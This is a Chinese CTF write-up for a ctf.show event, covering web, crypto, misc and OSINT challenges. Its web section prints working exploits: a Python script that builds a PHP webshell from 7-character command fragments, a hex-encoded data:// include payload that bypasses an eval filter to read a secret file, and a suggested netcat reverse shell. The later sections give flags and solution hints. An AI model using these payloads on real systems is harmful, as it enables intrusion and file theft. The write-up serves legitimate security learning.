文章目录
- Web
- web签到
- easy_calc
- easy_cmd
- Crypto
- 密码签到
- Misc
- 杂项签到
- Osint
- 社工签到
- 迷失的大象
- 大飞机
原文
Web
web签到
固定长度RCE,限定7位数字,直接给出exp
# -*- coding: utf-8 -*-
# @Time : 2022/8/4 22:03
# @Author : pysnow
# !/usr/bin/python
# -*- coding: UTF-8 -*-
import timeimport requestsurl = "http://4432ad06-416e-4375-9e8a-e8499e9bb8cb.challenge.ctf.show/api/tools.php"
print("[+]start attack!!!")
with open("payload.txt", "r") as f:for i in f:print("[*]" + url.format(i.strip()))data = {"cmd": i.strip()}res = requests.post(url, data=data)time.sleep(3)print(res.text)test = requests.get("http://172d5c73-1dfe-4f7c-b39e-599a19aba8df.challenge.ctf.show/api/1.php")
if test.status_code == requests.codes.ok:print("[*]Attack success!!!")>hp
>1.p\\
>d\>\\
>\ -\\
>e64\\
>bas\\
>7\|\\
>XSk\\
>Fsx\\
>dFV\\
>kX0\\
>bCg\\
>XZh\\
>AgZ\\
>waH\\
>PD9\\
>o\ \\
>ech\\
ls -t>0
sh 0
因为网络问题,每一条命令执行的时间都相近,所以要加一个延时,堵塞一下,保证文件名的顺序正确
然后访问1.php,RCE就行
easy_calc
源码
<?phpif(check($code)){eval('$result='."$code".";");echo($result);
}function check(&$code){$num1=$_POST['num1'];$symbol=$_POST['symbol'];$num2=$_POST['num2'];if(!isset($num1) || !isset($num2) || !isset($symbol) ){return false;}if(preg_match("/!|@|#|\\$|\%|\^|\&|\(|_|=|{|'|<|>|\?|\?|\||`|~|\[/", $num1.$num2.$symbol)){return false;}if(preg_match("/^[\+\-\*\/]$/", $symbol)){$code = "$num1$symbol$num2";return true;}return false;
}
一个传三个参数,其中两个数字,一个符号,分号这些没过滤,可以执行多个命令,所以寻找最容易绕过的地方,也就是num12
/!|@|#|\\$|\%|\^|\&|\(|_|=|{|'|<|>|\?|\?|\||`|~|\[/
过滤了很多符号,最重要的用来执行函数的括号也给过滤了,但是有个东西执行是不需要括号的,那就是文件包含
include "1.php" == include("1.php");
include "data://text/plain,<?php phpinfo(); ?>" == phpinfo();
这里data内容可以使用hex编码绕过,即最终payload如下
num1=include "\x64\x61\x74\x61\x3a\x2f\x2f\x74\x65\x78\x74\x2f\x70\x6c\x61\x69\x6e\x2c\x3c\x3f\x70\x68\x70\x20\x73\x79\x73\x74\x65\x6d\x28\x27\x63\x61\x74\x20\x2f\x73\x65\x63\x72\x65\x74\x27\x29\x3b\x3f\x3e";&symbol=%2D&num2=1
flag在/secret
easy_cmd
源码
<?phperror_reporting(0);
highlight_file(__FILE__);$cmd=$_POST['cmd'];if(preg_match("/^\b(ping|ls|nc|ifconfig)\b/",$cmd)){exec(escapeshellcmd($cmd));
}
?>白名单,只给了ping ls ifconfig nc四个命令,由于这道题出网,所以可以直接用nc反弹shell
Crypto
密码签到
** 密文:y3rmc2hvd3tjcnlwdg9fc2lnbmlux2lzx2vhc3l9-a0004008a0**
描述:大牛在今年的hvv过程中,渗透进某业务系统,发现了密文,可是不知道如何解出明文,你能帮他找出来吗? 已知密文由两部分组成,后面的推测为秘钥
base64解一下,然后直接因为解出来的结果比较特殊,可以直接通过句意猜测出flag
ctfshow{crypto_signin_is_easy}
Misc
杂项签到
010打开,在文件结尾出有flag
Osint
社工签到
给了一张图,要求找到图中所在的位置,通过观察图片可以发现这是一个微博博主发的
本来做题的时候是直接找到了跟这个原图很相似的博文,结果后面补wp的时候又找不到了,所以直接百度识图吧
天涯镇 or 天涯小镇
迷失的大象
百度识图一把梭
ctfshow{墨江哈尼族自治县}
大飞机
同样是百度识图,找到一个贴吧
因为航班太久远了,所以搜索不到航班,尝试搜索另外一张图片找到了下面这篇知乎匿名回答,用的是原图,其中的评论区答案就是航班号
ctfshow{CA981}
